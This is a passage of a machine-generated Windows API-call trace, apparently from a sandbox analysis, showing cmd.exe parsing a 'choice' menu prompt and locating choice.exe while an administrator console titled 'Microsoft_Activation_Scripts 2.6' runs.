dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x276a [0181.380] GetProcessHeap () returned 0x19a8f1e0000 [0181.380] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0181.381] GetProcessHeap () returned 0x19a8f1e0000 [0181.381] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0181.381] GetProcessHeap () returned 0x19a8f1e0000 [0181.382] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0181.382] GetProcessHeap () returned 0x19a8f1e0000 [0181.383] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9f80) returned 1 [0181.383] GetProcessHeap () returned 0x19a8f1e0000 [0181.383] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5550) returned 1 [0181.383] GetProcessHeap () returned 0x19a8f1e0000 [0181.384] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0181.384] GetProcessHeap () returned 0x19a8f1e0000 [0181.385] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0181.385] GetProcessHeap () returned 0x19a8f1e0000 [0181.385] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20caf0) returned 1 [0181.385] GetProcessHeap () returned 0x19a8f1e0000 [0181.386] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc200) returned 1 [0181.386] GetProcessHeap () returned 0x19a8f1e0000 [0181.387] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0181.387] GetProcessHeap () returned 0x19a8f1e0000 [0181.388] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc7a0) returned 1 [0181.388] GetProcessHeap () returned 0x19a8f1e0000 [0181.388] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0181.388] GetProcessHeap () returned 0x19a8f1e0000 [0181.389] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0181.389] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.389] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x276a [0181.389] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0181.389] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10114, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2782 [0181.389] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="choice /C:123456780 /N\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="choice /C:123456780 /N\r\n~3 \"%~4\"\r\n[0m\r\nreen% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 24 [0181.390] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.390] GetFileType (hFile=0x9c) returned 0x1 [0181.390] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.390] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2782 [0181.390] GetProcessHeap () returned 0x19a8f1e0000 [0181.390] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.390] GetProcessHeap () returned 0x19a8f1e0000 [0181.391] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.392] _wcsicmp (_String1="choice", _String2=")") returned 58 [0181.392] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0181.392] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0181.392] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0181.392] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0181.392] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0181.392] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0181.392] GetProcessHeap () returned 0x19a8f1e0000 [0181.392] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0181.392] GetProcessHeap () returned 0x19a8f1e0000 [0181.392] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb6e0 [0181.392] GetProcessHeap () returned 0x19a8f1e0000 [0181.392] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0a30 [0181.392] _tell (_FileHandle=3) returned 10114 [0181.392] _close (_FileHandle=3) returned 0 [0181.393] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0181.393] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0181.393] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0181.393] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0181.393] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0181.393] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0181.393] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0181.393] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0181.393] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0181.393] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0181.393] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0181.393] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0181.393] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0181.393] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0181.393] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0181.393] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0181.396] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0181.396] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0181.396] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0181.396] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0181.396] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0181.396] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0181.396] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0181.396] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0181.396] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0181.396] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0181.396] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0181.396] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0181.396] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0181.396] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0181.396] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0181.396] _wcsicmp (_String1="choice", _String2="START") returned -16 [0181.396] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0181.396] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0181.396] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0181.397] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0181.397] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0181.397] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0181.397] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0181.397] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0181.397] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0181.397] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0181.397] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0181.397] GetProcessHeap () returned 0x19a8f1e0000 [0181.397] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1fd1c0 [0181.397] SetErrorMode (uMode=0x0) returned 0x0 [0181.397] SetErrorMode (uMode=0x1) returned 0x0 [0181.397] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1fd1d0, lpFilePart=0x43f9efec80 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efec80*="System32") returned 0x13 [0181.397] SetErrorMode (uMode=0x0) returned 0x1 [0181.397] GetProcessHeap () returned 0x19a8f1e0000 [0181.397] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fd1c0, Size=0x46) returned 0x19a8f1fd1c0 [0181.397] GetProcessHeap () returned 0x19a8f1e0000 [0181.397] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fd1c0) returned 0x46 [0181.397] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0181.398] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.398] GetProcessHeap () returned 0x19a8f1e0000 [0181.398] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fa1f0 [0181.398] GetProcessHeap () returned 0x19a8f1e0000 [0181.398] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1eabb0 [0181.398] GetProcessHeap () returned 0x19a8f1e0000 [0181.398] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xf0) returned 0x19a8f1eabb0 [0181.398] GetProcessHeap () returned 0x19a8f1e0000 [0181.398] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xf0 [0181.398] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0181.398] GetProcessHeap () returned 0x19a8f1e0000 [0181.398] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eacb0 [0181.398] GetProcessHeap () returned 0x19a8f1e0000 [0181.398] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eacb0, Size=0x88) returned 0x19a8f1eacb0 [0181.398] GetProcessHeap () returned 0x19a8f1e0000 [0181.398] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eacb0) returned 0x88 [0181.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.398] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\choice.*" (normalized: "c:\\windows\\system32\\choice.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efea00) returned 0x19a8f1f8700 [0181.399] FindClose (in: hFindFile=0x19a8f1f8700 | out: hFindFile=0x19a8f1f8700) returned 1 [0181.399] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\choice.COM" (normalized: "c:\\windows\\system32\\choice.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efea00) returned 0xffffffffffffffff [0181.399] GetLastError () returned 0x2 [0181.399] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\choice.EXE" (normalized: "c:\\windows\\system32\\choice.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efea00) returned 0x19a8f1f8880 [0181.399] FindClose (in: hFindFile=0x19a8f1f8880 | out: hFindFile=0x19a8f1f8880) returned 1 [0181.399] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0181.399] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0181.399] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.400] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0181.400] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0181.400] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0181.400] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0181.400] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0181.400] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0181.400] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0181.400] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0181.400] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0181.400] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0181.400] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0181.401] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0181.401] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0181.401] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0181.401] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0181.401] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0181.401] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0181.401] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0181.401] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0181.401] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0181.401] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0181.401] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0181.401] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0181.401] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0181.401] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0181.401] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0181.401] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0181.401] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0181.401] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0181.401] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0181.401] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0181.401] _wcsicmp (_String1="choice", _String2="START") returned -16 [0181.401] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0181.401] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0181.401] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0181.401] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0181.402] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0181.402] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0181.402] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0181.402] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0181.402] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0181.402] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0181.402] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0181.402] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0181.402] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0181.402] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0181.402] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0181.402] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0181.402] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0181.402] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0181.402] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0181.402] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0181.402] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0181.402] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0181.402] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0181.402] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0181.402] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0181.402] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0181.402] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0181.402] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0181.402] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0181.402] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0181.403] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0181.403] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0181.403] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0181.403] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0181.403] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0181.403] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0181.403] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0181.403] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0181.403] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0181.403] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0181.403] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0181.403] _wcsicmp (_String1="choice", _String2="START") returned -16 [0181.403] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0181.403] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0181.403] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0181.403] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0181.403] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0181.403] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0181.403] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0181.403] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0181.403] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0181.403] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0181.403] _wcsicmp (_String1="choice", _String2="FOR") returned -3 [0181.403] _wcsicmp (_String1="choice", _String2="IF") returned -6 [0181.403] _wcsicmp (_String1="choice", _String2="REM") returned -15 [0181.404] GetProcessHeap () returned 0x19a8f1e0000 [0181.404] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20b9f0 [0181.404] GetProcessHeap () returned 0x19a8f1e0000 [0181.404] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x40) returned 0x19a8f1f9590 [0181.404] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0181.404] GetProcessHeap () returned 0x19a8f1e0000 [0181.404] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1fd220 [0181.404] SetErrorMode (uMode=0x0) returned 0x0 [0181.404] SetErrorMode (uMode=0x1) returned 0x0 [0181.404] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1fd230, lpFilePart=0x43f9efe4f0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe4f0*="System32") returned 0x13 [0181.404] SetErrorMode (uMode=0x0) returned 0x1 [0181.404] GetProcessHeap () returned 0x19a8f1e0000 [0181.404] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fd220, Size=0x46) returned 0x19a8f1fd220 [0181.404] GetProcessHeap () returned 0x19a8f1e0000 [0181.404] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fd220) returned 0x46 [0181.404] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0181.404] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.404] GetProcessHeap () returned 0x19a8f1e0000 [0181.404] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fbdf0 [0181.405] GetProcessHeap () returned 0x19a8f1e0000 [0181.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1f9f80 [0181.405] GetProcessHeap () returned 0x19a8f1e0000 [0181.405] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9f80, Size=0xf0) returned 0x19a8f1f9f80 [0181.405] GetProcessHeap () returned 0x19a8f1e0000 [0181.405] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9f80) returned 0xf0 [0181.405] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0181.405] GetProcessHeap () returned 0x19a8f1e0000 [0181.405] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1fa080 [0181.405] GetProcessHeap () returned 0x19a8f1e0000 [0181.405] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fa080, Size=0x88) returned 0x19a8f1fa080 [0181.405] GetProcessHeap () returned 0x19a8f1e0000 [0181.405] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fa080) returned 0x88 [0181.405] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.405] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\choice.*" (normalized: "c:\\windows\\system32\\choice.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe270) returned 0x19a8f1f8a00 [0181.405] FindClose (in: hFindFile=0x19a8f1f8a00 | out: hFindFile=0x19a8f1f8a00) returned 1 [0181.406] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\choice.COM" (normalized: "c:\\windows\\system32\\choice.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe270) returned 0xffffffffffffffff [0181.406] GetLastError () returned 0x2 [0181.406] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\choice.EXE" (normalized: "c:\\windows\\system32\\choice.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe270) returned 0x19a8f1f8760 [0181.406] FindClose (in: hFindFile=0x19a8f1f8760 | out: hFindFile=0x19a8f1f8760) returned 1 [0181.406] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0181.406] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0181.406] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe7d0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.407] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe6f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe5f0 | out: lpAttributeList=0x43f9efe6f0, lpSize=0x43f9efe5f0) returned 1 [0181.407] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe6f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe5dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe6f0, lpPreviousValue=0x0) returned 1 [0181.407] GetStartupInfoW (in: lpStartupInfo=0x43f9efe680 | out: lpStartupInfo=0x43f9efe680*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0181.407] GetProcessHeap () returned 0x19a8f1e0000 [0181.407] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb710 [0181.407] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0181.407] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0181.407] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0181.407] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0181.407] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0181.407] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0181.407] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0181.407] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0181.407] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0181.408] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0181.409] _wcsnicmp 